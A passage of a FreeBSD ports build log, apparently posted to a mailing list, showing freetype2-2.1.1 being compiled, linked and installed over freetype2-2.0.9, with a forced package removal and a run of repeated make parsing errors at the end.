reetype2/work/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freet= ype2/work/freetype-2.1.1/src/psnames -o /usr/ports/print/freetype2/work/fre= etype-2.1.1/objs/psnames.lo /usr/ports/print/freetype2/work/freetype-2.1.1/= src/psnames/psmodule.c rm -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/psnames.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/psnames /usr/ports/print/freetype2/work/freetype-2.1.1/src/p= snames/psmodule.c -fPIC -DPIC -o /usr/ports/print/freetype2/work/freetype-= 2.1.1/objs/.libs/psnames.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/psnames /usr/ports/print/freetype2/work/freetype-2.1.1/src/p= snames/psmodule.c -o /usr/ports/print/freetype2/work/freetype-2.1.1/objs/ps= names.o >/dev/null 2>&1 mv -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/psnames.lo = /usr/ports/print/freetype2/work/freetype-2.1.1/objs/psnames.lo /usr/ports/print/freetype2/work/freetype-2.1.1/builds/unix/libtool --mode= =3Dcompile cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr= /ports/print/freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/f= reetype2/work/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freet= ype2/work/freetype-2.1.1/src/raster -o /usr/ports/print/freetype2/work/free= type-2.1.1/objs/raster.lo /usr/ports/print/freetype2/work/freetype-2.1.1/sr= c/raster/raster.c rm -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/raster.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/raster /usr/ports/print/freetype2/work/freetype-2.1.1/src/ra= ster/raster.c -fPIC -DPIC -o /usr/ports/print/freetype2/work/freetype-2.1.= 1/objs/.libs/raster.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/raster /usr/ports/print/freetype2/work/freetype-2.1.1/src/ra= ster/raster.c -o /usr/ports/print/freetype2/work/freetype-2.1.1/objs/raster= .o >/dev/null 2>&1 mv -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/raster.lo /= usr/ports/print/freetype2/work/freetype-2.1.1/objs/raster.lo /usr/ports/print/freetype2/work/freetype-2.1.1/builds/unix/libtool --mode= =3Dcompile cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr= /ports/print/freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/f= reetype2/work/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freet= ype2/work/freetype-2.1.1/src/sfnt -o /usr/ports/print/freetype2/work/freety= pe-2.1.1/objs/sfnt.lo /usr/ports/print/freetype2/work/freetype-2.1.1/src/sf= nt/sfnt.c rm -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/sfnt.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/sfnt /usr/ports/print/freetype2/work/freetype-2.1.1/src/sfnt= /sfnt.c -fPIC -DPIC -o /usr/ports/print/freetype2/work/freetype-2.1.1/objs= /.libs/sfnt.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/sfnt /usr/ports/print/freetype2/work/freetype-2.1.1/src/sfnt= /sfnt.c -o /usr/ports/print/freetype2/work/freetype-2.1.1/objs/sfnt.o >/dev= /null 2>&1 mv -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/sfnt.lo /us= r/ports/print/freetype2/work/freetype-2.1.1/objs/sfnt.lo /usr/ports/print/freetype2/work/freetype-2.1.1/builds/unix/libtool --mode= =3Dcompile cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr= /ports/print/freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/f= reetype2/work/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freet= ype2/work/freetype-2.1.1/src/smooth -o /usr/ports/print/freetype2/work/free= type-2.1.1/objs/smooth.lo /usr/ports/print/freetype2/work/freetype-2.1.1/sr= c/smooth/smooth.c rm -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/smooth.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/smooth /usr/ports/print/freetype2/work/freetype-2.1.1/src/sm= ooth/smooth.c -fPIC -DPIC -o /usr/ports/print/freetype2/work/freetype-2.1.= 1/objs/.libs/smooth.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/smooth /usr/ports/print/freetype2/work/freetype-2.1.1/src/sm= ooth/smooth.c -o /usr/ports/print/freetype2/work/freetype-2.1.1/objs/smooth= .o >/dev/null 2>&1 mv -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/smooth.lo /= usr/ports/print/freetype2/work/freetype-2.1.1/objs/smooth.lo /usr/ports/print/freetype2/work/freetype-2.1.1/builds/unix/libtool --mode= =3Dcompile cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr= /ports/print/freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/f= reetype2/work/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freet= ype2/work/freetype-2.1.1/src/truetype -o /usr/ports/print/freetype2/work/fr= eetype-2.1.1/objs/truetype.lo /usr/ports/print/freetype2/work/freetype-2.1.= 1/src/truetype/truetype.c rm -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/truetype.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/truetype /usr/ports/print/freetype2/work/freetype-2.1.1/src/= truetype/truetype.c -fPIC -DPIC -o /usr/ports/print/freetype2/work/freetyp= e-2.1.1/objs/.libs/truetype.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/truetype /usr/ports/print/freetype2/work/freetype-2.1.1/src/= truetype/truetype.c -o /usr/ports/print/freetype2/work/freetype-2.1.1/objs/= truetype.o >/dev/null 2>&1 mv -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/truetype.lo= /usr/ports/print/freetype2/work/freetype-2.1.1/objs/truetype.lo /usr/ports/print/freetype2/work/freetype-2.1.1/builds/unix/libtool --mode= =3Dcompile cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr= /ports/print/freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/f= reetype2/work/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freet= ype2/work/freetype-2.1.1/src/type1 -o /usr/ports/print/freetype2/work/freet= ype-2.1.1/objs/type1.lo /usr/ports/print/freetype2/work/freetype-2.1.1/src/= type1/type1.c rm -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/type1.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/type1 /usr/ports/print/freetype2/work/freetype-2.1.1/src/typ= e1/type1.c -fPIC -DPIC -o /usr/ports/print/freetype2/work/freetype-2.1.1/o= bjs/.libs/type1.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/type1 /usr/ports/print/freetype2/work/freetype-2.1.1/src/typ= e1/type1.c -o /usr/ports/print/freetype2/work/freetype-2.1.1/objs/type1.o >= /dev/null 2>&1 mv -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/type1.lo /u= sr/ports/print/freetype2/work/freetype-2.1.1/objs/type1.lo /usr/ports/print/freetype2/work/freetype-2.1.1/builds/unix/libtool --mode= =3Dcompile cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr= /ports/print/freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/f= reetype2/work/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freet= ype2/work/freetype-2.1.1/src/type42 -o /usr/ports/print/freetype2/work/free= type-2.1.1/objs/type42.lo /usr/ports/print/freetype2/work/freetype-2.1.1/sr= c/type42/type42.c rm -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/type42.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/type42 /usr/ports/print/freetype2/work/freetype-2.1.1/src/ty= pe42/type42.c -fPIC -DPIC -o /usr/ports/print/freetype2/work/freetype-2.1.= 1/objs/.libs/type42.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/type42 /usr/ports/print/freetype2/work/freetype-2.1.1/src/ty= pe42/type42.c -o /usr/ports/print/freetype2/work/freetype-2.1.1/objs/type42= .o >/dev/null 2>&1 mv -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/type42.lo /= usr/ports/print/freetype2/work/freetype-2.1.1/objs/type42.lo /usr/ports/print/freetype2/work/freetype-2.1.1/builds/unix/libtool --mode= =3Dcompile cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr= /ports/print/freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/f= reetype2/work/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freet= ype2/work/freetype-2.1.1/src/winfonts -o /usr/ports/print/freetype2/work/fr= eetype-2.1.1/objs/winfnt.lo /usr/ports/print/freetype2/work/freetype-2.1.1/= src/winfonts/winfnt.c rm -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/winfnt.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/winfonts /usr/ports/print/freetype2/work/freetype-2.1.1/src/= winfonts/winfnt.c -fPIC -DPIC -o /usr/ports/print/freetype2/work/freetype-= 2.1.1/objs/.libs/winfnt.lo cc -I/usr/ports/print/freetype2/work/freetype-2.1.1/objs -I/usr/ports/print= /freetype2/work/freetype-2.1.1/builds/unix -I/usr/ports/print/freetype2/wor= k/freetype-2.1.1/include -c -O -pipe -I/usr/ports/print/freetype2/work/free= type-2.1.1/src/winfonts /usr/ports/print/freetype2/work/freetype-2.1.1/src/= winfonts/winfnt.c -o /usr/ports/print/freetype2/work/freetype-2.1.1/objs/wi= nfnt.o >/dev/null 2>&1 mv -f /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/winfnt.lo /= usr/ports/print/freetype2/work/freetype-2.1.1/objs/winfnt.lo /usr/ports/print/freetype2/work/freetype-2.1.1/builds/unix/libtool --mode= =3Dlink cc -o /usr/ports/print/freetype2/work/freetype-2.1.1/objs/libfreety= pe.la /usr/ports/print/freetype2/work/freetype-2.1.1/objs/ftsystem.lo /usr= /ports/print/freetype2/work/freetype-2.1.1/objs/ftdebug.lo /usr/ports/print= /freetype2/work/freetype-2.1.1/objs/ftinit.lo /usr/ports/print/freetype2/wo= rk/freetype-2.1.1/objs/ftbase.lo /usr/ports/print/freetype2/work/freetype-2= .1.1/objs/ftglyph.lo /usr/ports/print/freetype2/work/freetype-2.1.1/objs/ft= mm.lo /usr/ports/print/freetype2/work/freetype-2.1.1/objs/ftbdf.lo /usr/por= ts/print/freetype2/work/freetype-2.1.1/objs/fttype1.lo /usr/ports/print/fre= etype2/work/freetype-2.1.1/objs/ftxf86.lo /usr/ports/print/freetype2/work/f= reetype-2.1.1/objs/ftbbox.lo /usr/ports/print/freetype2/work/freetype-2.1.1= /objs/autohint.lo /usr/ports/print/freetype2/work/freetype-2.1.1/objs/bdf.l= o /usr/ports/print/freetype2/work/freetype-2.1.1/objs/ftcache.lo /usr/ports= /print/freetype2/work/freetype-2.1.1/objs/cff.lo /usr/ports/print/freetype2= /work/freetype-2.1.1/objs/type1cid.lo /usr/ports/print/freetype2/work/freet= ype-2.1.1/objs/pcf.lo /usr/ports/print/freetype2/work/freetype-2.1.1/objs/p= fr.lo /usr/ports/print/freetype2/work/freetype-2.1.1/objs/psaux.lo /usr/por= ts/print/freetype2/work/freetype-2.1.1/objs/pshinter.lo /usr/ports/print/fr= eetype2/work/freetype-2.1.1/objs/psnames.lo /usr/ports/print/freetype2/work= /freetype-2.1.1/objs/raster.lo /usr/ports/print/freetype2/work/freetype-2.1= .1/objs/sfnt.lo /usr/ports/print/freetype2/work/freetype-2.1.1/objs/smooth.= lo /usr/ports/print/freetype2/work/freetype-2.1.1/objs/truetype.lo /usr/por= ts/print/freetype2/work/freetype-2.1.1/objs/type1.lo /usr/ports/print/freet= ype2/work/freetype-2.1.1/objs/type42.lo /usr/ports/print/freetype2/work/fre= etype-2.1.1/objs/winfnt.lo -rpath /usr/local/lib -version-info 9:1:3 rm -fr /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/libfreetyp= e.la /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/libfreetype.= * /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/libfreetype.* cc -shared -Wl,--rpath -Wl,/usr/local/lib /usr/ports/print/freetype2/work= /freetype-2.1.1/objs/ftsystem.lo /usr/ports/print/freetype2/work/freetype-2= .1.1/objs/ftdebug.lo /usr/ports/print/freetype2/work/freetype-2.1.1/objs/ft= init.lo /usr/ports/print/freetype2/work/freetype-2.1.1/objs/ftbase.lo /usr/= ports/print/freetype2/work/freetype-2.1.1/objs/ftglyph.lo /usr/ports/print/= freetype2/work/freetype-2.1.1/objs/ftmm.lo /usr/ports/print/freetype2/work/= freetype-2.1.1/objs/ftbdf.lo /usr/ports/print/freetype2/work/freetype-2.1.1= /objs/fttype1.lo /usr/ports/print/freetype2/work/freetype-2.1.1/objs/ftxf86= .lo /usr/ports/print/freetype2/work/freetype-2.1.1/objs/ftbbox.lo /usr/port= s/print/freetype2/work/freetype-2.1.1/objs/autohint.lo /usr/ports/print/fre= etype2/work/freetype-2.1.1/objs/bdf.lo /usr/ports/print/freetype2/work/free= type-2.1.1/objs/ftcache.lo /usr/ports/print/freetype2/work/freetype-2.1.1/o= bjs/cff.lo /usr/ports/print/freetype2/work/freetype-2.1.1/objs/type1cid.lo = /usr/ports/print/freetype2/work/freetype-2.1.1/objs/pcf.lo /usr/ports/print= /freetype2/work/freetype-2.1.1/objs/pfr.lo /usr/ports/print/freetype2/work/= freetype-2.1.1/objs/psaux.lo /usr/ports/print/freetype2/work/freetype-2.1.1= /objs/pshinter.lo /usr/ports/print/freetype2/work/freetype-2.1.1/objs/psnam= es.lo /usr/ports/print/freetype2/work/freetype-2.1.1/objs/raster.lo /usr/po= rts/print/freetype2/work/freetype-2.1.1/objs/sfnt.lo /usr/ports/print/freet= ype2/work/freetype-2.1.1/objs/smooth.lo /usr/ports/print/freetype2/work/fre= etype-2.1.1/objs/truetype.lo /usr/ports/print/freetype2/work/freetype-2.1.1= /objs/type1.lo /usr/ports/print/freetype2/work/freetype-2.1.1/objs/type42.l= o /usr/ports/print/freetype2/work/freetype-2.1.1/objs/winfnt.lo -Wl,-sona= me -Wl,libfreetype.so.9 -o /usr/ports/print/freetype2/work/freetype-2.1.1/o= bjs/.libs/libfreetype.so.9 (cd /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs && rm -f libf= reetype.so && ln -sf libfreetype.so.9 libfreetype.so) ar cru /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/libfreetyp= e.a /usr/ports/print/freetype2/work/freetype-2.1.1/objs/ftsystem.o /usr/po= rts/print/freetype2/work/freetype-2.1.1/objs/ftdebug.o /usr/ports/print/fre= etype2/work/freetype-2.1.1/objs/ftinit.o /usr/ports/print/freetype2/work/fr= eetype-2.1.1/objs/ftbase.o /usr/ports/print/freetype2/work/freetype-2.1.1/o= bjs/ftglyph.o /usr/ports/print/freetype2/work/freetype-2.1.1/objs/ftmm.o /u= sr/ports/print/freetype2/work/freetype-2.1.1/objs/ftbdf.o /usr/ports/print/= freetype2/work/freetype-2.1.1/objs/fttype1.o /usr/ports/print/freetype2/wor= k/freetype-2.1.1/objs/ftxf86.o /usr/ports/print/freetype2/work/freetype-2.1= .1/objs/ftbbox.o /usr/ports/print/freetype2/work/freetype-2.1.1/objs/autohi= nt.o /usr/ports/print/freetype2/work/freetype-2.1.1/objs/bdf.o /usr/ports/p= rint/freetype2/work/freetype-2.1.1/objs/ftcache.o /usr/ports/print/freetype= 2/work/freetype-2.1.1/objs/cff.o /usr/ports/print/freetype2/work/freetype-2= .1.1/objs/type1cid.o /usr/ports/print/freetype2/work/freetype-2.1.1/objs/pc= f.o /usr/ports/print/freetype2/work/freetype-2.1.1/objs/pfr.o /usr/ports/pr= int/freetype2/work/freetype-2.1.1/objs/psaux.o /usr/ports/print/freetype2/w= ork/freetype-2.1.1/objs/pshinter.o /usr/ports/print/freetype2/work/freetype= -2.1.1/objs/psnames.o /usr/ports/print/freetype2/work/freetype-2.1.1/objs/r= aster.o /usr/ports/print/freetype2/work/freetype-2.1.1/objs/sfnt.o /usr/por= ts/print/freetype2/work/freetype-2.1.1/objs/smooth.o /usr/ports/print/freet= ype2/work/freetype-2.1.1/objs/truetype.o /usr/ports/print/freetype2/work/fr= eetype-2.1.1/objs/type1.o /usr/ports/print/freetype2/work/freetype-2.1.1/ob= js/type42.o /usr/ports/print/freetype2/work/freetype-2.1.1/objs/winfnt.o=20 ranlib /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs/libfreetyp= e.a creating /usr/ports/print/freetype2/work/freetype-2.1.1/objs/libfreetype.la (cd /usr/ports/print/freetype2/work/freetype-2.1.1/objs/.libs && rm -f libf= reetype.la && ln -sf ../libfreetype.la libfreetype.la) ---> Backing up the old version ---> Uninstalling the old version ---> Deinstalling 'freetype2-2.0.9' ---> Preserving /usr/local/lib/libfreetype.so.9 as /usr/local/lib/compat/p= kg/libfreetype.so.9 pkg_delete: package 'freetype2-2.0.9' is required by these other packages and may not be deinstalled (but I'll delete it anyway): Mesa-3.4.2_2 XFree86-Server-4.2.0_2 XFree86-VirtualFramebufferServer-4.2.0_1 XFree86-clients-4.2.0_2 XFree86-documents-4.2.0 XFree86-font100dpi-4.2.0 XFree86-font75dpi-4.2.0 XFree86-fontCyrillic-4.2.0 XFree86-fontDefaultBitmaps-4.2.0 XFree86-fontEncodings-4.2.0 XFree86-fontScalable-4.2.0 XFree86-libraries-4.2.0_1 XFree86-manuals-4.2.0 aalib-1.4.r5_1 aterm-0.4.2 bbconf-1.4 blackbox-0.62.1 ethereal-0.9.3 ghostscript-afpl-7.04_5 gimp-1.2.3,1 gtk-1.2.10_4 gtkmm-1.2.8 icewm-esound-1.0.9.2 ickle-0.3.1 imlib-1.9.14_1 jdk-1.3.1p6_4 jedit-4.0.0 lame-gtk-3.91 libungif-4.1.0b1 linux-mozilla-0.9.9.2002050810 mplayer-gtk-0.90.0.4 peps-1.0 qt-2.3.1_2 sdl-1.2.4_1 ttmkfdir-0.0 urwfonts-1.0 vim-6.1.48 wrapper-1.0_2 xemacs-21.1.14 xmbmon-107p1 xmms-esound-1.2.7_1 xosd-0.7.0_1 xpm-3.4k xv-3.10a_2 [Updating the pkgdb in /var/db/pkg ... - 149 packages f= ound (-1 +0) (...) done] ---> Installing the new version via the port =3D=3D=3D> Installing for freetype2-2.1.1 /usr/ports/print/freetype2/work/freetype-2.1.1/builds/unix/mkinstalldirs /u= sr/local/lib \ /usr/local/include/freetype2/freetype/config \ /usr/local/include/freetype2/freetype/internal \ /usr/local/include/freetype2/freetype/cache \ /usr/local/bin mkdir /usr/local/include/freetype2 mkdir /usr/local/include/freetype2/freetype mkdir /usr/local/include/freetype2/freetype/config mkdir /usr/local/include/freetype2/freetype/internal mkdir /usr/local/include/freetype2/freetype/cache /usr/ports/print/freetype2/work/freetype-2.1.1/builds/unix/libtool --mode= =3Dinstall /usr/bin/install -c -o root -g wheel /usr/ports/print/freetype2/= work/freetype-2.1.1/objs/libfreetype.la /usr/local/lib /usr/bin/install -c -o root -g wheel /usr/ports/print/freetype2/work/freety= pe-2.1.1/objs/.libs/libfreetype.so.9 /usr/local/lib/libfreetype.so.9 (cd /usr/local/lib && rm -f libfreetype.so && ln -sf libfreetype.so.9 libfr= eetype.so) /usr/bin/install -c -o root -g wheel /usr/ports/print/freetype2/work/freety= pe-2.1.1/objs/.libs/libfreetype.a /usr/local/lib/libfreetype.a ranlib /usr/local/lib/libfreetype.a chmod 644 /usr/local/lib/libfreetype.a /usr/bin/env OBJFORMAT=3D"elf" /sbin/ldconfig -m /usr/local/lib ---------------------------------------------------------------------- Libraries have been installed in: /usr/local/lib If you ever happen to want to link against installed libraries in a given directory, LIBDIR, you must either use libtool, and specify the full pathname of the library, or use `-LLIBDIR' flag during linking and do at least one of the following: - add LIBDIR to the `LD_LIBRARY_PATH' environment variable during execution - add LIBDIR to the `LD_RUN_PATH' environment variable during linking - use the `-Wl,--rpath -Wl,LIBDIR' linker flag See any operating system documentation about shared libraries for more information, such as the ld(1) and ld.so(8) manual pages. ---------------------------------------------------------------------- for P in /usr/ports/print/freetype2/work/freetype-2.1.1/include/freetype/fr= eetype.h /usr/ports/print/freetype2/work/freetype-2.1.1/include/freetype/ft= bbox.h /usr/ports/print/freetype2/work/freetype-2.1.1/include/freetype/ftbd= f.h /usr/ports/print/freetype2/work/freetype-2.1.1/include/freetype/ftcache= .h /usr/ports/print/freetype2/work/freetype-2.1.1/include/freetype/ftchapte= rs.h /usr/ports/print/freetype2/work/freetype-2.1.1/include/freetype/fterrd= ef.h /usr/ports/print/freetype2/work/freetype-2.1.1/include/freetype/fterro= rs.h /usr/ports/print/freetype2/work/freetype-2.1.1/include/freetype/ftglyp= h.h /usr/ports/print/freetype2/work/freetype-2.1.1/include/freetype/ftimage= .h /usr/ports/print/freetype2/work/freetype-2.1.1/include/freetype/ftlist.h= /usr/ports/print/freetype2/work/freetype-2.1.1/include/freetype/ftmac.h /u= sr/ports/print/freetype2/work/freetype-2.1.1/include/freetype/ftmm.h /usr/p= orts/print/freetype2/work/freetype-2.1.1/include/freetype/ftmoderr.h /usr/p= orts/print/freetype2/work/freetype-2.1.1/include/freetype/ftmodule.h /usr/p= orts/print/freetype2/work/freetype-2.1.1/include/freetype/ftoutln.h /usr/po= rts/print/freetype2/work/freetype-2.1.1/include/freetype/ftrender.h /usr/po= rts/print/freetype2/work/freetype-2.1.1/include/freetype/ftsizes.h /usr/por= ts/print/freetype2/work/freetype-2.1.1/include/freetype/ftsnames.h /usr/por= ts/print/freetype2/work/freetype-2.1.1/include/freetype/ftsynth.h /usr/port= s/print/freetype2/work/freetype-2.1.1/include/freetype/ftsysio.h /usr/ports= /print/freetype2/work/freetype-2.1.1/include/freetype/ftsysmem.h /usr/ports= /print/freetype2/work/freetype-2.1.1/include/freetype/ftsystem.h /usr/ports= /print/freetype2/work/freetype-2.1.1/include/freetype/fttrigon.h /usr/ports= /print/freetype2/work/freetype-2.1.1/include/freetype/fttypes.h /usr/ports/= print/freetype2/work/freetype-2.1.1/include/freetype/ftxf86.h /usr/ports/pr= int/freetype2/work/freetype-2.1.1/include/freetype/t1tables.h /usr/ports/pr= int/freetype2/work/freetype-2.1.1/include/freetype/ttnameid.h /usr/ports/pr= int/freetype2/work/freetype-2.1.1/include/freetype/tttables.h /usr/ports/pr= int/freetype2/work/freetype-2.1.1/include/freetype/tttags.h ; do = \ install -c -o root -g wheel -m 444 $P /usr/local/include/freetype= 2/freetype ; \ done "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator "./builds/toplevel.mk", line 46: Need an operator "./builds/toplevel.mk", line 48: Need an operator "./builds/toplevel.mk", line 59: Missing dependency operator "./builds/toplevel.mk", line 61: Need an operator Error expanding embedded variable. "Makefile", line 26: Need an operator "Makefile", line 28: Need an operator 